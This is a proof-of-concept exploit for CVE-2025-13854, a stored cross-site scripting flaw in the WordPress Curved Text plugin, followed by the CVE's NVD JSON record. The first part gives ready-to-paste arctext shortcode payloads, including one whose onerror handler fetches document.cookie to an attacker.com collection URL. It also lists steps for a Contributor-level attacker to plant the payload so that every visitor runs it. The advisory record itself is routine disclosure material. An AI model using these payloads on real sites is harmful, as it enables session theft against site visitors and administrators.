CVE-2025-13854

<!-- CVE-2025-13854 PoC - Stored XSS via arctext shortcode radius parameter --> <!-- Basic XSS payload --> [arctext radius='"><script>alert(document.cookie)</script>'] Your Text Here [/arctext] <!-- Event handler based XSS payload --> [arctext radius='123' onload='alert(String.fromCharCode(88,83,83))'] Curved Text [/arctext] <!-- Image tag based XSS payload --> [arctext radius='100' onerror='fetch("https://attacker.com/steal?c="+document.cookie)'] Text Content [/arctext] <!-- Exploitation scenario: Create a post with contributor access --> <!-- 1. Attacker with Contributor role creates/edits a post --> <!-- 2. Insert the malicious shortcode with XSS payload --> <!-- 3. Publish the post --> <!-- 4. Any user visiting the page will execute the injected JavaScript -->

{"cve": {"id": "CVE-2025-13854", "sourceIdentifier": "[email protected]", "published": "2026-01-09T12:15:52.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Curved Text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'radius' parameter of the arctext shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Curved Text para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro 'radius' del shortcode arctext en todas las versiones hasta la 0.1, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/curved-text/tags/0.1/curved-text.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/curved-text/trunk/curved-text.php#L32", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/48514fdb-20c6-4a7f-8f60-e532ddd8853e?source=cve", "source": "[email protected]"}]}}